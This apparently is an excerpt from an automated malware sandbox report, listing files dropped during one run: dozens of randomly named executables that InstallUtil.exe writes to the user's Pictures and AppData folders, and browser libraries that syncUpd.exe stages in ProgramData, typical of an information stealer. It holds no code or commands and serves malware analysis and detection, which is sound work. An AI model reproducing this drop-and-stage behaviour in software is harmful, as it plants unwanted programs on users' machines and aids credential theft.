                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\I6q6xa8OpNqFa1GE2NL68OxV.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\lznQzS1TH9pXKZRxAqzqQkL6.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\UprBod0MfH0m1ueg8M7NFcZO.exe
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe | File created: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\qG1eZgNFl32oR6XaByxxsti8.exe
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | File created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe | File created: C:\Users\user\AppData\Local\Temp\nso877A.tmp\INetC.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\3Dkw4ZNwPrQyjD2TIlPKqqcu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\Hop5LZOSpSEQI7m8FjwEmAFM.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\jCE8bXuh8rIt9xQkDFallzd3.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp | File created: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_shfoldr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\VNELGq4SA6E208JFhlubKLrW.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\ProgramData\vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\uxptymMcmvbx69QBLmPJcQze.exe
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\1EkTthwf6man8aNjDkP3iYby.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\x04n3uUaS11tAr964Wnf0UiP.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\qfkuB5AfAibkngkYmzaWujj1.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\HTdfKOlxDXLXF51uNbI6vixn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Xm54wLBRTMA3iYcjiLbASkwx.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\rE439KsrV4PvRPEPLReHeUKA.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\kO0savj64UXXAiEut7imvfm6.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\9ZQJrRTgdPaUJ304O2m7brvm.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\8aNg0kr81H7icHssfXxzSpJA.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\tXjvjjDiP8Yt1Jt8HVI20nW0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\DPGpD7PIH8c8yVMwr4qCC9xb.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_package
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\3MdVqnAjjJf11QnuXHbMYjzK.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\CpPXXcmjwTrziBJjEjzVBqIO.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\TnWsoNZIfxfOxOyjMDzsjp4X.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\zrNC9V37VM40VjYOUVLhb0U4.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\CdEhnJSfHuIH8YctINSx9az5.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\SwLW7tCu3MPLSebktZR0Do4H.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\lXVa1j6vkIafyXGwBSkciSaS.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\CtkVfcoX8wimAKTiEdjfwDJu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\UxKWXTOyF8lfN9EFXnRW4uyo.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\eEM7C0Rv28sfywWhlfTCHeZU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\qz6mIWczIdkFWvUoxRClMBD1.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\QIr2p18CO0NWQIPJWCtoKG30.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\CS3CADtKPwRlkcskf1l0OgKj.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\FB8WWwveYgNXuiUkbF3okOil.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\49zPHg8djprKbR3fbyK34TE8.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\MzHVcwfiHGLesknyk5lMjLDt.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\TUgcsAhZj9KS9L7Y6WBtONe5.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\FPqrFrEMEodivHfNwvaAYSOn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\cJULOAzDG8uw9IL3YQcAMkXZ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\DdT3rCn1HYZaeiTB6islHQa6.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\FhrkCEo26ZJ4quT9M55j4UZC.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\f6TPmOqJ9OCeCveaR02i6cCx.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe | File created: C:\Users\user\AppData\Local\Temp\syncUpd.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\is-QD6MG.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\8jUidrpuHoVjNOY4pHjFpeFG.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\K8iQZVR1QcKL7tq874t7OVK9.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\ProgramData\freebl3.dll
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\51fuIpAxuIxVSFNlFyLCdDUf.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\dJWgkx2NkzIq27ZmDKfJlJSb.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\f2hw2VKIAGcHQqAtIrjN8igU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\EG9LlsStc5z1vHzpFwj8p7wd.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\BOLsN3rxBHAIGUMuUJ7tVz6n.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\dWXd3iKvKIXWjmhGzJ9IYi7c.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\E4yp79Qa2EvDhsHlzSxMTwUz.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\W9H4HN9nxOMI1O5S9bvIXaEw.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\psx7APF9OMF37aNjA84tdfdB.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\jF6qc598AF3P3yZTYHAMeb77.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\4ie4IrFHavveqFWO7SvVdq2i.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\NQMtpPx9qXPy8v0LlF2Kjrle.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\Z7skxxTmXai6Pa9s6OHd8pTL.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\f3pOxPQt48GSFGTaAT61XRX4.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\u9uxsYMpS7D32QErsHuYUixB.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\is-JGFR0.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\xPkU0vAnxq9kCf406fqJmxI3.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\zILQneSJVLXUhxcgTc89dcSy.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_setup64.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\JqI9qtwrsBIQ597pcbH2GGod.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp | File created: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_iscrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\nGTzGa5UK9rAljUvktVMxS0i.exe
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027464559972.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\is-IJOFC.tmp
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280464513384.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\4mWZecCdz0lcVaculQKtsYsb.exe
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_package
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\tq2omEDUE6K9wwE4bnua6F2o.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\is-AD4K7.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\bphIzQx0dXuhocT7snNOGKWG.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\NIrszCqD63mWfcibv0YdSwFl.exe
                        Source: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe | File created: C:\Users\user\AppData\Local\Temp\is-TUI0V.tmp\mlSjlt4YcfcpuVp4aQsoCouK.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\cOpSW0Wlkj1ce9hBfVKYpMs8.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\6kncXrojwkHyPQnSTc2Nn28Z.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\wQY4uiHIT1Rmw3D6dX7Mml4K.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\tOekaWBMtMvKgKTpn1rNSApR.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\K3GYZyKSoKi9rBsYPEMYaWx1.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\ocxqlsVNXtyLzp2zpxnsa8Mt.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\htMajCePjPdapCkAov1lc8J9.exe
                        Source: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe | File created: C:\Users\user\AppData\Local\Temp\is-AMVCA.tmp\uOoBNdE6Sm5DmPd13osCbhQm.tmp
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp | File created: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_shfoldr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\6ZqpY056kcnYDSL39QayoHTr.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\ZMwlUWMtiNLOgzHdIp3EVbeM.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\XexwpboKjyWVbo8FFgPmChDN.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\O50rYOnObKacSw7359do7lgN.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\51lQApdWbXELTdretyNDFkhG.exe
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | File created: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\qtBU2wcdiddM8Ew6K9GV1QbJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\x8JusOpOPD2Ef7JVSoCYQS8k.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\3TgecgfsPBFevp0C7lLcJJOk.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\79Szb4ZgprIQoh5kmp3Ht91W.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\nacv1V5amvW0txqp8nJ7QSVf.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\N9lxfrZyrFBnT9kkfNS8cZTT.exe
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Opera_108.0.5067.24_Autoupdate_x64[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\t6FVjUQyIYOEGsrhSQAlAtYA.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | File created: C:\Users\user\AppData\Local\Web Link Analyzer\libvorbis-0.dll (copy)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\cBFvqvrl6uXFbTB4JYYj3iX2.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File created: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\HPykbtSofo4ieesmLEyEOoa7.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\OGlsLpt3IrpM6JOWnTsyCqhd.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\1IQ1OhLwzIr1htrixbUaD3zt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zpUboT49MR3eAuGylrU8kcsm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gEy33b1wzb5JaeAUext9FbaV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275032111804.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XcjiyfDAp1xg32d0IyIg2zMk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\JRoV34kN30OEKUZzqqQMQIaH.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-L0QM8.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\D2g51ebrTdw2dcv4PFU8OjS1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\pqTEuXs4oMBqF8pyFu5iVhTO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3Vvy4C64NGc3rMim5VqOvcXj.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\CTBhrqB7vKJROnvunuZcUFAZ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\wGeagqqn2DOY11i8cqkdcJ6l.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\f1VJcAMWETqBCjZqFoktlvLX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\M6twW38X7sVJZxeigqyEpnb7.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rpBCc3ylG3nivVIH9WHFRiU0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\IfzaP4WqQEdUcGlnXuUZNlcC.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\nNmaiuLbBvtjFhtSarVAt2ZV.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\GU2AoS4KXuNbCT975QhkMBWI.exeJump to dropped file
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\v88rIHAQvxZfLboOPn5cTWY9.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\QHmCOGrGcBV6cGjqniLiFdsr.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NZM2kE4xFO5iDsk9Rikx4C6y.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ju6O9RRnwY5cmyJE9vtS2Jgt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\LAuOzs2TVXyzss3wQ1slqfrw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\VF8FZJ0N2C8kYnK4sTeCIQXo.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\o9mWBH3W8d1Wz63VdcWUPlCt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\UMNq6JQCwcuFbKEJ00C7NaNb.exeJump to dropped file
